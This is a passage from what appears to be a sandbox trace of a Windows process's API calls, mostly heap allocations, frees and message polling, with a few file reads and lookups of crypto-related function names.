lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0043.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.825] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.825] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.828] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x18e5, lpOverlapped=0x0) returned 1 [0043.828] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x118e5) returned 0xac2018 [0043.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0043.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x118e5) returned 0x935008 [0043.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.831] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x118e5) returned 0xac2018 [0043.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.832] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x118e5) returned 0xac2018 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x118e5) returned 0x9468f8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.835] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.835] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.836] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.836] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.837] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0043.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.838] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0043.838] RtlAllocateHeap 